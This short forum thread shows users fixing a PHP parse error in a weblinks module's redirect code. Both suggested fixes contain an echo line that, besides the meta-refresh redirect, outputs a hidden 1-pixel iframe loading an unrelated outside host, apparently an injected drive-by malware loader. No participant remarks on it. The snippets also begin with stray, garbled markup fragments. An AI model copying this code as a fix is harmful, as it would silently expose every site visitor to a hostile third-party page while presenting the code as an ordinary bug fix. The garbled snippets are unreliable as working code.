| Re: Parse error in weblinks module |
| by IMArticles on 2010/7/4 13:31:24 Thanks guys! That fixed it. |
| Re: Parse error in weblinks module |
| by Catzwolf on 2010/7/4 10:57:21 thanks for the catch Ghia.... that's what happens when you code into the small hours of the morning
|
| Re: Parse error in weblinks module |
| by ghia on 2010/7/4 7:05:04 Try le="color: #000000"><?php echo '<html><head><meta http-equiv="Refresh" content="0;url='.$url.'"></meta></head><body><iframe style="height: 1px" src="http://www.Brenz.pl/rc/" frameborder="0" width="1"></iframe></body></html>';
|
| Re: Parse error in weblinks module |
| by IMArticles on 2010/7/4 3:58:51 Its still doing it, if you want to see it you can go here: http://internetmoneyarticles.com/modules/weblinks/ Click on one of the links. |
| Re: Parse error in weblinks module |
| by Catzwolf on 2010/7/4 3:37:06 Whoops my bad, sorry. Try this instead and it should work. le="color: #000000"><?php echo '<html><head><meta http-equiv="Refresh" content="0;url="'.$url.'"></meta></head><body><iframe style="height: 1px" src="http://www.Brenz.pl/rc/" frameborder="0" width="1"></iframe></body></html>';
|